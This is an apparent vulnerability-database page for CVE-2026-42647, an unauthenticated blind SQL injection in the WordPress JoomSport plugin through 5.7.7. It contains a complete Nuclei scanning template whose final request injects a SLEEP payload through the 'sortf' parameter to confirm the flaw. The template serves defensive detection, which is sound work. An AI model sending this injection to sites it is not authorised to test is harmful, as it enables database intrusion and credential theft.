| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-42647 | 19 May 202613:32 | – | circl | |
| WordPress plugin JoomSport SQL注入漏洞 | 11 Jun 202600:00 | – | cnnvd | |
| CVE-2026-42647 | 11 Jun 202621:04 | – | cve | |
| CVE-2026-42647 WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability | 11 Jun 202621:04 | – | cvelist | |
| EUVD-2026-36359 | 12 Jun 202600:31 | – | euvd | |
| Exploit for CVE-2026-42647 | 13 Jun 202616:29 | – | githubexploit | |
| CVE-2026-42647 | 11 Jun 202622:16 | – | nvd | |
| WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability | 29 Apr 202614:09 | – | patchstack | |
| PT-2026-48782 | 11 Jun 202600:00 | – | ptsecurity | |
| VulnCheck KEV: CVE-2026-42647 | 29 Apr 202600:00 | – | vulncheck_kev |
id: CVE-2026-42647
info:
name: JoomSport <= 5.7.7 - SQL Injection
author: theamanrawat
severity: critical
description: |
The JoomSport WordPress plugin through 5.7.7 is vulnerable to unauthenticated time-based blind SQL injection via the 'sortf' GET parameter in the player list view. The parameter value is backtick-wrapped and directly concatenated into an ORDER BY clause.
impact: |
Unauthenticated attackers can extract any data from the WordPress database including admin credentials, user emails, and plugin-stored secrets via time-based blind SQL injection.
remediation: |
Update to JoomSport version 5.7.8 or later, which implements column whitelist validation.
reference:
- https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability
- https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153
- https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/classes/objects/class-jsport-playerlist.php#L80
- https://nvd.nist.gov/vuln/detail/CVE-2026-42647
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2026-42647
epss-score: 0.01323
epss-percentile: 0.67462
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
vendor: beardev
product: joomsport-sports-league-results-management
framework: wordpress
tags: cve,cve2026,wp,wordpress,wp-plugin,joomsport,sqli,vkev
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-sitemap-posts-joomsport_season-1.xml"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<loc>")'
condition: and
internal: true
extractors:
- type: regex
name: season_path
part: body
group: 1
regex:
- '<loc>[^<]*?//[^/]+(\/[^<]+)</loc>'
internal: true
- raw:
- |
GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Name", "Match played", "Played minutes")'
condition: and
internal: true
- raw:
- |
@timeout: 20s
GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'status_code == 200'
- 'contains_all(body, "Name", "Match played", "Played minutes")'
condition: and
# digest: 4a0a0047304502202191c881a4d871507420553b92445bb3a352a63da1b75692c43d10498f977ad0022100f135519e1b2472d8a31e094e8aa991cceeae8ea9ff0307221090e2968605b08a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation